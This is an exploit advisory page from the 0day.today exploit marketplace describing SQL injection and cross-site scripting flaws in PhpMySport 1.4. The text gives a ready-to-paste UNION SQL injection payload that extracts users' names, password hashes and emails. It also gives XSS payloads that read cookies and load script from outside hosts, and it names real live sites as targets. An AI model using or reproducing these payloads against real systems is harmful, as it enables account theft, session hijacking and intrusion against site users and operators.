0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PhpMySport 1.4 (XSS/SQL) Multiple Remote Vulnerabilities
[========================================================
PhpMySport 1.4 (XSS/SQL) Multiple Remote Vulnerabilities
========================================================
#####################################################################
# + PhpMySport v. 1.4 Multiple Remote Vulnerabilities (XSS\SQL) + #
#####################################################################
-Product site: http://phpmysport.sourceforge.net
-Version vuln: 1.4(latest) and maybe <
[+] COD3:
The code vuln is at page /member_list.php (SQL)
and many others for (XSS) like
/index.php (v3/4/5/6)
[+] EXPLoIt:
>>[$QL]<<
The bug is on the search_member page of this script
Yuo can write some bad sql code for see tha MD5 encrypted password ant name and other of the users..Example:
http://www.example.com/index.php?r=membre&v1=member_list
write in a search_member form:
-999'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat(member_firstname,0x3a,member_pass,0x3a,member_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/**/from/**/pms_member#
Now yuo can see the name, password and e-mail of users in the order:
name:password:email
Yuo can also see other informations like description, date of connection,country_id, sex, level_id, lastname, date of birth etc..
(this form is vuln to XSS.. try to inject javaScript ;-))
>>[XSS]<<
There are some pages vuln..
for example
http://www.example.com/index.php?r=competition&v1=view&v2=1&v3=1&v4=&v5=all&v6=[XSS]
[XSS] = "><script>alert(document.cookie)</script>
or
"><script src="http://www.badsite.com/page.js"></script>
########::D&m0::########
[SQL]:
http://olmobasket.altervista.org/phpmysport/index.php?r=membro&v1=member_list
Write in the search_member form the right query:
-999'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat(member_firstname,0x3a,member_pass,0x3a,member_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/**/from/**/pms_member#
Yuo will see the name:password:email of victims
[XSS]:
http://phpmysport.sourceforge.net/demo/index.php?r=competition&v1=view&v2=1&v3=1&v4=&v5=all&v6=5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%20src=http://www.securitycode.it/x.js%3E%3C/script%3E
#############
/.end
"They danced down the streets like dingledodies, and I shambled after as I've been doing all my life after people who interest me, because the only people for me are the mad ones, the ones who are mad to live, mad to talk, mad to be saved, desirous of everything at the same time, the ones who never yawn or say a commonplace thing, but burn, burn, burn like fabulous yellow roman candles exploding like spiders across the stars and in the middle you see the blue centerlight pop and everybody goes "OHooooo!"
<3 Beat Generation (or Byte generation ;-))
# 0day.today [2024-11-15] #